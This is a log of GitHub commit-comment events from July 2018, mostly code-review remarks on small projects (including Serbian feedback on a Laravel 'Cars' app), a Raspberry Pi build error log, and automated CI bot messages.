{"id":"7969968447","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"nmedan/Cars"},"payload":{"comment":{"id":29718690,"position":12,"line":12,"path":".vs/VSWorkspaceState.json","commit_id":"6aa060f3e8038e39c498258afd76186da62ea633","created_at":"2018-07-16T11:00:45Z","updated_at":"2018-07-16T11:00:45Z","author_association":"NONE","body":"Mislim da ceo ovaj `.vs` folder treba da ide u `.gitignore`"}},"created_at":"2018-07-16T11:00:45Z"}
{"id":"7969972785","type":"CommitCommentEvent","actor":{"login":"n-t-roff"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29718693,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-16T11:01:47Z","updated_at":"2018-07-16T11:01:47Z","author_association":"OWNER","body":"The changes of \"E th\" etc. was my fault, i just forgot to update the regression test. I now also remember the issue with dotlessj: It is not available on some systems and hence I removed the line in the makefile. Using makefiles is not in general a bad idea. A regression test is best done automatically and has a pass/fail result. Of course in the current case a manual test is adequate too. The hint to compare ditroff output too is correct, I'll update the regression test to do this."}},"created_at":"2018-07-16T11:01:47Z"}
{"id":"7969973969","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"nmedan/Cars"},"payload":{"comment":{"id":29718695,"position":2,"line":14,"path":"app/Http/Controllers/CarsController.php","commit_id":"7659564023454cfece4d84f0df7bde32d16db1f4","created_at":"2018-07-16T11:02:04Z","updated_at":"2018-07-16T11:02:04Z","author_association":"NONE","body":"Cini mi se da ovde ne valja indentacija"}},"created_at":"2018-07-16T11:02:04Z"}
{"id":"7969975795","type":"CommitCommentEvent","actor":{"login":"peternewman"},"repo":{"name":"codespell-project/codespell"},"payload":{"comment":{"id":29718700,"position":4,"line":2846,"path":"codespell_lib/data/dictionary.txt","commit_id":"0ec7a72bc46d6166cfcf6d676a106cc02b7faa5a","created_at":"2018-07-16T11:02:30Z","updated_at":"2018-07-16T11:02:30Z","author_association":"CONTRIBUTOR","body":"The second option here seems like a rather huge leap."}},"created_at":"2018-07-16T11:02:30Z"}
{"id":"7969977080","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"nmedan/Cars"},"payload":{"comment":{"id":29718701,"position":3,"line":3,"path":"database/migrations/2014_10_12_000000_create_users_table.php","commit_id":"7659564023454cfece4d84f0df7bde32d16db1f4","created_at":"2018-07-16T11:02:50Z","updated_at":"2018-07-16T11:02:50Z","author_association":"NONE","body":"Ne bi trebalo brisati ove fajlove, mogu kasnije posluziti, na njih se Laravel oslanja za citav `User` model"}},"created_at":"2018-07-16T11:02:50Z"}
{"id":"7969978857","type":"CommitCommentEvent","actor":{"login":"ProgVal"},"repo":{"name":"ProgVal/rust-xml-schema"},"payload":{"comment":{"id":29718706,"position":39,"line":39,"path":"src/support.rs","commit_id":"2215f48b27e25ecca1e78c0d82d0e928b1a54fc8","created_at":"2018-07-16T11:03:16Z","updated_at":"2018-07-16T11:03:16Z","author_association":"OWNER","body":"Are you sure?\r\n\r\n> Equality is identity, except that  0 = −0  (although they are not identical) and  NaN ≠ NaN  (although NaN is of course identical to itself).\r\n\r\nhttps://www.w3.org/TR/xmlschema11-2/#float"}},"created_at":"2018-07-16T11:03:16Z"}
{"id":"7969979125","type":"CommitCommentEvent","actor":{"login":"fpletz"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29718709,"position":null,"line":null,"path":null,"commit_id":"fd2448b2e6ec49808bb3a92e7ad99ac8318bb8e5","created_at":"2018-07-16T11:03:20Z","updated_at":"2018-07-16T11:03:20Z","author_association":"MEMBER","body":"Thanks!"}},"created_at":"2018-07-16T11:03:20Z"}
{"id":"7969979955","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"nmedan/Cars"},"payload":{"comment":{"id":29718712,"position":13,"line":32,"path":"database/migrations/2018_07_15_100702_create-cars-table.php","commit_id":"7659564023454cfece4d84f0df7bde32d16db1f4","created_at":"2018-07-16T11:03:32Z","updated_at":"2018-07-16T11:03:32Z","author_association":"NONE","body":"Ovaj obrisani red bi trebalo da ostane tu gde jeste, jer ako u `up()` metodi kreiras tabelu, u `down()` treba da uradis suprotno, tj. da je dropujes"}},"created_at":"2018-07-16T11:03:32Z"}
{"id":"7969983190","type":"CommitCommentEvent","actor":{"login":"peternewman"},"repo":{"name":"codespell-project/codespell"},"payload":{"comment":{"id":29718715,"position":13,"line":3053,"path":"codespell_lib/data/dictionary.txt","commit_id":"0ec7a72bc46d6166cfcf6d676a106cc02b7faa5a","created_at":"2018-07-16T11:04:19Z","updated_at":"2018-07-16T11:04:19Z","author_association":"CONTRIBUTOR","body":"I'm confused, it's offering the existing spelling as a correction of itself?"}},"created_at":"2018-07-16T11:04:19Z"}
{"id":"7969987132","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"nmedan/Cars"},"payload":{"comment":{"id":29718720,"position":1,"line":1,"path":"public/css/bootstrap-reboot.css","commit_id":"3c3a9083e333b5796ff43775299021b898e50825","created_at":"2018-07-16T11:05:18Z","updated_at":"2018-07-16T11:05:18Z","author_association":"NONE","body":"Trenutno najpozeljnija opcija je samo u `<head>` glavnog blade fajla staviti Bootstrap CDN, jer nije bas potrebna cela biblioteka za stvari koje ste radili."}},"created_at":"2018-07-16T11:05:18Z"}
{"id":"7969987815","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"nmedan/Cars"},"payload":{"comment":{"id":29718721,"position":7,"line":1,"path":"resources/views/about.blade.php","commit_id":"3c3a9083e333b5796ff43775299021b898e50825","created_at":"2018-07-16T11:05:28Z","updated_at":"2018-07-16T11:05:28Z","author_association":"NONE","body":"Indentacija"}},"created_at":"2018-07-16T11:05:28Z"}
{"id":"7969988916","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"nmedan/Cars"},"payload":{"comment":{"id":29718726,"position":10,"line":4,"path":"resources/views/cars/index.blade.php","commit_id":"3c3a9083e333b5796ff43775299021b898e50825","created_at":"2018-07-16T11:05:44Z","updated_at":"2018-07-16T11:05:44Z","author_association":"NONE","body":"Indentacija treba da bude uredna"}},"created_at":"2018-07-16T11:05:44Z"}
{"id":"7969989044","type":"CommitCommentEvent","actor":{"login":"Jan-E"},"repo":{"name":"hydra3333/ffmpeg-windows-build-helpers-withOpenCL"},"payload":{"comment":{"id":29718727,"position":null,"line":null,"path":null,"commit_id":"4f863317dd8de70723881da5dbfd7e7da8e4bd44","created_at":"2018-07-16T11:05:46Z","updated_at":"2018-07-16T11:05:46Z","author_association":"NONE","body":"My own builds are about as fast as Zeranoe's. This is a recent version:\r\nhttps://phpdev.toolsforresearch.com/mympeg.zip\r\n\r\nBuilt with GCC 5.2.0. My builds contain a special volume normalisation filter, that was rejected by the FFmpeg dev's for some puristic reasons: https://github.com/Jan-E/MyMpeg/blob/master/ffmpeg_patches/volnorm_new.patch\r\nExample usage: `ebur128=metadata=1,volume=metadata=lavfi.r128.I,ebur128=framelog=verbose`\r\n\r\nSince then a comparable filter was accepted by the FFmpeg devs without any discussion:\r\nhttps://ffmpeg.org/ffmpeg-filters.html#loudnorm\r\nHowever, this filter slows the transcoding considerably (about 30%)."}},"created_at":"2018-07-16T11:05:46Z"}
{"id":"7969991001","type":"CommitCommentEvent","actor":{"login":"ScallyBag"},"repo":{"name":"LeelaChessZero/lc0"},"payload":{"comment":{"id":29718732,"position":null,"line":null,"path":null,"commit_id":"a530848dad2817dc592e0167f29274677c0884e0","created_at":"2018-07-16T11:06:12Z","updated_at":"2018-07-16T11:06:12Z","author_association":"NONE","body":"Hi,\r\n\r\nDo I need to install something else now? The Raspberry Pi build has worked every time until this latest push.\r\n\r\nThanks,\r\n\r\nAl.\r\n\r\nHere’s the error log:\r\n\r\nBuild started at 2018-07-16T11:55:16.497689\r\nMain binary: /usr/bin/python3\r\nPython system: Linux\r\nThe Meson build system\r\nVersion: 0.46.1\r\nSource dir: /home/Al/lc0\r\nBuild dir: /home/Al/lc0/build/release\r\nBuild type: native build\r\nProject name: lc0\r\nSanity testing C++ compiler: c++\r\nIs cross compiler: False.\r\nSanity check compiler command line: c++ /home/Al/lc0/build/release/meson-private/sanitycheckcpp.cc -o /home/Al/lc0/build/release/meson-private/sanitycheckcpp.exe\r\nSanity check compile stdout:\r\n\r\n-----\r\nSanity check compile stderr:\r\n\r\n-----\r\nRunning test binary command: /home/Al/lc0/build/release/meson-private/sanitycheckcpp.exe\r\nNative C++ compiler: c++ (gcc 6.3.0 \"c++ (Raspbian 6.3.0-18+rpi1+deb9u1) 6.3.0 20170516\")\r\nBuild machine cpu family: arm\r\nBuild machine cpu: armv7l\r\nFound pkg-config: /usr/bin/pkg-config (0.29)\r\nDetermining dependency 'protobuf' with pkg-config executable '/usr/bin/pkg-config'\r\nUsing protobuf from cache.\r\nUsing protobuf-3.5.1-2w-wrap.zip from cache.\r\n\r\n\r\nExecuting subproject protobuf.\r\n\r\nProject name: protobuf\r\nNative C++ compiler: c++ (gcc 6.3.0 \"c++ (Raspbian 6.3.0-18+rpi1+deb9u1) 6.3.0 20170516\")\r\nRunning compile:\r\nWorking directory:  /tmp/tmpdtwn0zv3\r\nCommand line:  c++ /tmp/tmpdtwn0zv3/testfile.cpp -pipe -D_FILE_OFFSET_BITS=64 -c -o /tmp/tmpdtwn0zv3/output.obj -O0 -fpermissive -DHAVE_PTHREAD \r\n\r\nCode:\r\n int i;\r\n\r\nCompiler stdout:\r\n \r\nCompiler stderr:\r\n \r\nCompiler for C++ supports arguments -DHAVE_PTHREAD: YES\r\nRunning compile:\r\nWorking directory:  /tmp/tmpbszx1ije\r\nCommand line:  c++ /tmp/tmpbszx1ije/testfile.cpp -pipe -D_FILE_OFFSET_BITS=64 -c -o /tmp/tmpbszx1ije/output.obj -O0 -fpermissive -Wno-sign-compare -Wsign-compare \r\n\r\nCode:\r\n int i;\r\n\r\nCompiler stdout:\r\n \r\nCompiler stderr:\r\n \r\nCompiler for C++ supports arguments -Wno-sign-compare -Wsign-compare: YES\r\nRunning compile:\r\nWorking directory:  /tmp/tmpsekrudwt\r\nCommand line:  c++ /tmp/tmpsekrudwt/testfile.cpp -pipe -D_FILE_OFFSET_BITS=64 -c -o /tmp/tmpsekrudwt/output.obj -O0 -fpermissive -Wno-unused-parameter -Wunused-parameter \r\n\r\nCode:\r\n int i;\r\n\r\nCompiler stdout:\r\n \r\nCompiler stderr:\r\n \r\nCompiler for C++ supports arguments -Wno-unused-parameter -Wunused-parameter: YES\r\nRunning compile:\r\nWorking directory:  /tmp/tmpa7hvdlcj\r\nCommand line:  c++ /tmp/tmpa7hvdlcj/testfile.cpp -pipe -D_FILE_OFFSET_BITS=64 -c -o /tmp/tmpa7hvdlcj/output.obj -O0 -fpermissive -Wno-ignored-qualifiers -Wignored-qualifiers \r\n\r\nCode:\r\n int i;\r\n\r\nCompiler stdout:\r\n \r\nCompiler stderr:\r\n \r\nCompiler for C++ supports arguments -Wno-ignored-qualifiers -Wignored-qualifiers: YES\r\nRunning compile:\r\nWorking directory:  /tmp/tmpxicp7jmu\r\nCommand line:  c++ /tmp/tmpxicp7jmu/testfile.cpp -pipe -D_FILE_OFFSET_BITS=64 -c -o /tmp/tmpxicp7jmu/output.obj -O0 -fpermissive /wd4146 \r\n\r\nCode:\r\n int i;\r\n\r\nCompiler stdout:\r\n \r\nCompiler stderr:\r\n c++: error: /wd4146: No such file or directory\r\n\r\nCompiler for C++ supports arguments /wd4146: NO\r\nRunning compile:\r\nWorking directory:  /tmp/tmphawir1fw\r\nCommand line:  c++ /tmp/tmphawir1fw/testfile.cpp -pipe -D_FILE_OFFSET_BITS=64 -c -o /tmp/tmphawir1fw/output.obj -O0 -fpermissive /wd4244 \r\n\r\nCode:\r\n int i;\r\n\r\nCompiler stdout:\r\n \r\nCompiler stderr:\r\n c++: error: /wd4244: No such file or directory\r\n\r\nCompiler for C++ supports arguments /wd4244: NO\r\nRunning compile:\r\nWorking directory:  /tmp/tmp94kbjw6x\r\nCommand line:  c++ /tmp/tmp94kbjw6x/testfile.cpp -pipe -D_FILE_OFFSET_BITS=64 -c -o /tmp/tmp94kbjw6x/output.obj -O0 -fpermissive /wd4305 \r\n\r\nCode:\r\n int i;\r\n\r\nCompiler stdout:\r\n \r\nCompiler stderr:\r\n c++: error: /wd4305: No such file or directory\r\n\r\nCompiler for C++ supports arguments /wd4305: NO\r\nRunning compile:\r\nWorking directory:  /tmp/tmps91un10j\r\nCommand line:  c++ /tmp/tmps91un10j/testfile.cpp -pipe -D_FILE_OFFSET_BITS=64 -c -o /tmp/tmps91un10j/output.obj -O0 -fpermissive /wd4506 \r\n\r\nCode:\r\n int i;\r\n\r\nCompiler stdout:\r\n \r\nCompiler stderr:\r\n c++: error: /wd4506: No such file or directory\r\n\r\nCompiler for C++ supports arguments /wd4506: NO\r\nDependency threads found: YES\r\nBuild targets in project: 6\r\n\r\nSubproject protobuf finished.\r\nDependency protobuf from subproject subprojects/protobuf found: YES\r\nProgram protoc found: NO\r\nMessage: protoc will be built from the subproject\r\n\r\nmeson.build:52:0: ERROR:  File libs/lczero-common/proto/net.proto does not exist.\r\n"}},"created_at":"2018-07-16T11:06:12Z"}
{"id":"7969992842","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29718738,"position":17,"line":17,"path":"contracts/Remittance.sol","commit_id":"f040eba728124d6baf71db5a0e88b0f4f78175c7","created_at":"2018-07-16T11:06:40Z","updated_at":"2018-07-16T11:06:40Z","author_association":"NONE","body":"I see, here it is overkill. It also gives the impression that there are 2 sources of truth."}},"created_at":"2018-07-16T11:06:40Z"}
{"id":"7969993940","type":"CommitCommentEvent","actor":{"login":"sasi-152"},"repo":{"name":"sasi-152/myrepo"},"payload":{"comment":{"id":29718742,"position":null,"line":null,"path":null,"commit_id":"c106857a1e235637752f965aacf477b4d38caa0c","created_at":"2018-07-16T11:06:57Z","updated_at":"2018-07-16T11:06:57Z","author_association":"OWNER","body":"ff"}},"created_at":"2018-07-16T11:06:57Z"}
{"id":"7969996363","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"nmedan/Cars"},"payload":{"comment":{"id":29718746,"position":13,"line":70,"path":"resources/views/welcome.blade.php","commit_id":"3c3a9083e333b5796ff43775299021b898e50825","created_at":"2018-07-16T11:07:32Z","updated_at":"2018-07-16T11:07:32Z","author_association":"NONE","body":"Ako ce `welcome.blade` extend-ovati `layout.master` u `welcome.blade`-u ne treba da postoji deo html-a koji vec imas u masteru, tacnije ova basic html struktura."}},"created_at":"2018-07-16T11:07:32Z"}
{"id":"7969996414","type":"CommitCommentEvent","actor":{"login":"haideriqbal"},"repo":{"name":"ebi-gene-expression-group/scxa-faceted-search-results"},"payload":{"comment":{"id":29718747,"position":null,"line":null,"path":null,"commit_id":"2c5abdc2c1239586606da5bfb228659e19e1266c","created_at":"2018-07-16T11:07:33Z","updated_at":"2018-07-16T11:07:33Z","author_association":"NONE","body":"* \"white-space\" attribute not \"wrap-whitespace\" in commit message"}},"created_at":"2018-07-16T11:07:33Z"}
{"id":"7969996679","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/ccdproc-feedstock"},"payload":{"comment":{"id":29718748,"position":null,"line":null,"path":null,"commit_id":"170c1a052c3c0e2a4ea83a43e2a751f4548bdcb7","created_at":"2018-07-16T11:07:37Z","updated_at":"2018-07-16T11:07:37Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @crawfordsm were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @crawfordsm were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-16T11:07:37Z"}
{"id":"7969998141","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"nmedan/Cars"},"payload":{"comment":{"id":29718754,"position":14,"line":71,"path":"resources/views/welcome.blade.php","commit_id":"3c3a9083e333b5796ff43775299021b898e50825","created_at":"2018-07-16T11:07:59Z","updated_at":"2018-07-16T11:07:59Z","author_association":"NONE","body":"Ne vidim da postoji `@endsection` na kraju sekcije"}},"created_at":"2018-07-16T11:07:59Z"}
{"id":"7969998989","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"nmedan/Cars"},"payload":{"comment":{"id":29718755,"position":8,"line":2,"path":"resources/views/about.blade.php","commit_id":"3c3a9083e333b5796ff43775299021b898e50825","created_at":"2018-07-16T11:08:12Z","updated_at":"2018-07-16T11:08:12Z","author_association":"NONE","body":"Fali `@endsection`"}},"created_at":"2018-07-16T11:08:12Z"}
{"id":"7970000124","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"nmedan/Cars"},"payload":{"comment":{"id":29718758,"position":8,"line":2,"path":"resources/views/cars/index.blade.php","commit_id":"3c3a9083e333b5796ff43775299021b898e50825","created_at":"2018-07-16T11:08:29Z","updated_at":"2018-07-16T11:08:29Z","author_association":"NONE","body":"Fali `@endsection`"}},"created_at":"2018-07-16T11:08:29Z"}
{"id":"7970000435","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29718759,"position":null,"line":null,"path":null,"commit_id":"61d3ffbeaf00d9305c8134c8aa637a9d056ceaee","created_at":"2018-07-16T11:08:32Z","updated_at":"2018-07-16T11:08:32Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 527](https://ci.hashicorp.engineering/viewLog.html?buildId=104081&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-16T11:08:32Z"}
{"id":"7970002650","type":"CommitCommentEvent","actor":{"login":"PolyacovYury"},"repo":{"name":"PolyacovYury/PYmods"},"payload":{"comment":{"id":29718761,"position":5,"line":52,"path":"source/scripts/client/gui/mods/mod_RemodEnabler/config.py","commit_id":"e662d7ac0066024bd6dc3c6b7eaae2a5cffd7858","created_at":"2018-07-16T11:09:05Z","updated_at":"2018-07-16T11:09:05Z","author_association":"OWNER","body":"Да просто реально непонятно, как это вообще произошло."}},"created_at":"2018-07-16T11:09:05Z"}
{"id":"7970002666","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29718762,"position":null,"line":null,"path":null,"commit_id":"7e5eac1472ade1157c035209a8f8ff1e68a88b66","created_at":"2018-07-16T11:09:06Z","updated_at":"2018-07-16T11:09:06Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 528](https://ci.hashicorp.engineering/viewLog.html?buildId=104082&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-16T11:09:06Z"}
{"id":"7970002675","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29718763,"position":null,"line":null,"path":null,"commit_id":"61d3ffbeaf00d9305c8134c8aa637a9d056ceaee","created_at":"2018-07-16T11:09:06Z","updated_at":"2018-07-16T11:09:06Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 527](https://ci.hashicorp.engineering/viewLog.html?buildId=104081&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:33"}},"created_at":"2018-07-16T11:09:06Z"}
{"id":"7970002783","type":"CommitCommentEvent","actor":{"login":"blueMoodBHD"},"repo":{"name":"espressif/esp-idf"},"payload":{"comment":{"id":29718765,"position":15,"line":117,"path":"examples/bluetooth/a2dp_sink/main/main.c","commit_id":"21af1d73399d5f70ca7799ef90a233e0d0e7e52c","created_at":"2018-07-16T11:09:08Z","updated_at":"2018-07-16T11:09:08Z","author_association":"COLLABORATOR","body":"If you want to use ping code, you should set the `iocap` as `ESP_BT_IO_CAP_OUT` or `ESP_BT_IO_CAP_IN`.\r\n\r\nBy the way, there is another misspell of `BT_SSP_INCLUDED ` below. \r\n"}},"created_at":"2018-07-16T11:09:08Z"}
{"id":"7970004064","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29718768,"position":null,"line":null,"path":null,"commit_id":"7e5eac1472ade1157c035209a8f8ff1e68a88b66","created_at":"2018-07-16T11:09:26Z","updated_at":"2018-07-16T11:09:26Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 528](https://ci.hashicorp.engineering/viewLog.html?buildId=104082&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:17"}},"created_at":"2018-07-16T11:09:26Z"}
{"id":"7970004425","type":"CommitCommentEvent","actor":{"login":"Jan-E"},"repo":{"name":"hydra3333/ffmpeg-windows-build-helpers-withOpenCL"},"payload":{"comment":{"id":29718769,"position":null,"line":null,"path":null,"commit_id":"4f863317dd8de70723881da5dbfd7e7da8e4bd44","created_at":"2018-07-16T11:09:32Z","updated_at":"2018-07-16T11:09:32Z","author_association":"NONE","body":"The reason I was looking at comparable projects was that I could not get --enable-d3d11va working. That is probably because the GCC is too old. Did you or @rdp ever try to get it enabled?"}},"created_at":"2018-07-16T11:09:32Z"}
{"id":"7970005878","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"NatasaRadovanovic/cars"},"payload":{"comment":{"id":29718772,"position":7,"line":17,"path":"routes/web.php","commit_id":"f1d0f224126bff270068ee87acd98a9ec0dde326","created_at":"2018-07-16T11:09:53Z","updated_at":"2018-07-16T11:09:53Z","author_association":"NONE","body":"Probaj nakon `,` da stavljas razmake, radi citljivosti. :) "}},"created_at":"2018-07-16T11:09:53Z"}
{"id":"7970010047","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"NatasaRadovanovic/cars"},"payload":{"comment":{"id":29718778,"position":12,"line":12,"path":"app/Http/Controllers/CarsController.php","commit_id":"f56e75fbbfa0d26a39c873d3514ba2dab4adeb47","created_at":"2018-07-16T11:10:52Z","updated_at":"2018-07-16T11:10:52Z","author_association":"NONE","body":"Indentacija nije konzistentna. Trebalo bi svuda da bude ista, ako je 4 space-a, onda svuda 4 space-a. Obicno za `php` ide 4 spaces"}},"created_at":"2018-07-16T11:10:52Z"}
{"id":"7970012974","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"NatasaRadovanovic/cars"},"payload":{"comment":{"id":29718784,"position":11,"line":11,"path":"resources/views/cars/index.blade.php","commit_id":"f56e75fbbfa0d26a39c873d3514ba2dab4adeb47","created_at":"2018-07-16T11:11:35Z","updated_at":"2018-07-16T11:11:35Z","author_association":"NONE","body":"Vidi da nikada ne pravis vise od jednog uzastopnog praznog reda. Jedan je ok  ako razdvaja neku celinu, vise od toga je visak"}},"created_at":"2018-07-16T11:11:35Z"}
{"id":"7970014066","type":"CommitCommentEvent","actor":{"login":"Tpt"},"repo":{"name":"ProgVal/rust-xml-schema"},"payload":{"comment":{"id":29718787,"position":39,"line":39,"path":"src/support.rs","commit_id":"2215f48b27e25ecca1e78c0d82d0e928b1a54fc8","created_at":"2018-07-16T11:11:50Z","updated_at":"2018-07-16T11:11:50Z","author_association":"NONE","body":"Indeed. I was confused by the RDF definition of equality that states that Nan = NaN"}},"created_at":"2018-07-16T11:11:50Z"}
{"id":"7970015899","type":"CommitCommentEvent","actor":{"login":"Manuel-777"},"repo":{"name":"Manuel-777/MTG-Arena-Tool"},"payload":{"comment":{"id":29718792,"position":null,"line":null,"path":null,"commit_id":"881ed4dda62dbb29303ed2fd7553e4be451bdca8","created_at":"2018-07-16T11:12:14Z","updated_at":"2018-07-16T11:12:14Z","author_association":"OWNER","body":"Fixes #8 "}},"created_at":"2018-07-16T11:12:14Z"}
{"id":"7970017326","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"NatasaRadovanovic/cars"},"payload":{"comment":{"id":29718795,"position":14,"line":5,"path":"resources/views/cars/index.blade.php","commit_id":"a07096e26076f1170070676188cfe1a25491a61c","created_at":"2018-07-16T11:12:34Z","updated_at":"2018-07-16T11:12:34Z","author_association":"NONE","body":"Indentacija se poremetila"}},"created_at":"2018-07-16T11:12:34Z"}
{"id":"7970020080","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"NatasaRadovanovic/cars"},"payload":{"comment":{"id":29718806,"position":63,"line":59,"path":"resources/views/welcome.blade.php","commit_id":"a07096e26076f1170070676188cfe1a25491a61c","created_at":"2018-07-16T11:13:17Z","updated_at":"2018-07-16T11:13:17Z","author_association":"NONE","body":"Indentacija :D"}},"created_at":"2018-07-16T11:13:17Z"}
{"id":"7970024616","type":"CommitCommentEvent","actor":{"login":"MariuszSkamra"},"repo":{"name":"MariuszSkamra/zephyr"},"payload":{"comment":{"id":29718814,"position":25,"line":56,"path":"subsys/mgmt/smp_bt.c","commit_id":"f025d603ab107f2e9bd0aa0cc0421458dc519b07","created_at":"2018-07-16T11:14:22Z","updated_at":"2018-07-16T11:14:22Z","author_association":"OWNER","body":"I found some kind of specification on https://github.com/apache/mynewt-mcumgr"}},"created_at":"2018-07-16T11:14:22Z"}
{"id":"7970025021","type":"CommitCommentEvent","actor":{"login":"cedel1"},"repo":{"name":"cedel1/MIA-API"},"payload":{"comment":{"id":29718819,"position":null,"line":null,"path":null,"commit_id":"4d5dacee78a94eb5b6eea672ead5eceea49877aa","created_at":"2018-07-16T11:14:29Z","updated_at":"2018-07-16T11:14:29Z","author_association":"OWNER","body":"__API Description file syntax error on line 72__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2018-07-16T11:14:29Z"}
{"id":"7970028225","type":"CommitCommentEvent","actor":{"login":"dubek"},"repo":{"name":"cisco/node-jose"},"payload":{"comment":{"id":29718827,"position":2,"line":2,"path":"lib/jwk/eckey.js","commit_id":"2715a3e95a09ae37b0a65ad3d5c0fd6855752f4e","created_at":"2018-07-16T11:15:15Z","updated_at":"2018-07-16T11:15:15Z","author_association":"NONE","body":"This should be:\r\n\r\n```\r\njwk/eckey.js - Ellyprtic Curve Key Representation\r\n```"}},"created_at":"2018-07-16T11:15:15Z"}
{"id":"7970030524","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29718833,"position":null,"line":null,"path":null,"commit_id":"41f8e39f4bc39100fbd959e3a116f096f5f42629","created_at":"2018-07-16T11:15:46Z","updated_at":"2018-07-16T11:15:46Z","author_association":"NONE","body":"issue-6829 (EnergyArchmage) - Win64-Windows-7-VisualStudio-14: OK (2781 of 2942 tests passed, 13 test warnings)\n\nMessages:\n\n * 14 tests had: AUD diffs.\n * 131 tests had: EIO diffs.\n * 96 tests had: ESO big diffs.\n * 160 tests had: Table big diffs.\n * 58 tests had: MTR big diffs.\n * 23 tests had: ERR diffs.\n * 21 tests had: ESO small diffs.\n * 17 tests had: MTR small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 462\n * Failed: 161\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-41f8e39f4bc39100fbd959e3a116f096f5f42629-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-41f8e39f4bc39100fbd959e3a116f096f5f42629-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-94.53%25-yellow.png)</a> \n"}},"created_at":"2018-07-16T11:15:46Z"}
{"id":"7970030852","type":"CommitCommentEvent","actor":{"login":"cedel1"},"repo":{"name":"cedel1/MIA-API"},"payload":{"comment":{"id":29718834,"position":null,"line":null,"path":null,"commit_id":"4d5dacee78a94eb5b6eea672ead5eceea49877aa","created_at":"2018-07-16T11:15:50Z","updated_at":"2018-07-16T11:15:50Z","author_association":"OWNER","body":"__API Description file syntax error on line 72__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2018-07-16T11:15:50Z"}
{"id":"7970031281","type":"CommitCommentEvent","actor":{"login":"cedel1"},"repo":{"name":"cedel1/MIA-API"},"payload":{"comment":{"id":29718837,"position":null,"line":null,"path":null,"commit_id":"4d5dacee78a94eb5b6eea672ead5eceea49877aa","created_at":"2018-07-16T11:15:56Z","updated_at":"2018-07-16T11:15:56Z","author_association":"OWNER","body":"__API Description file syntax error on line 72__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2018-07-16T11:15:56Z"}
{"id":"7970033421","type":"CommitCommentEvent","actor":{"login":"MinnDevelopment"},"repo":{"name":"hlaaftana/DiscordG"},"payload":{"comment":{"id":29718850,"position":null,"line":null,"path":null,"commit_id":"a31dee2b1115f1831939aebdef88662a55ac5479","created_at":"2018-07-16T11:16:25Z","updated_at":"2018-07-16T11:16:25Z","author_association":"NONE","body":"Please don't steal my ideas, kthx"}},"created_at":"2018-07-16T11:16:25Z"}
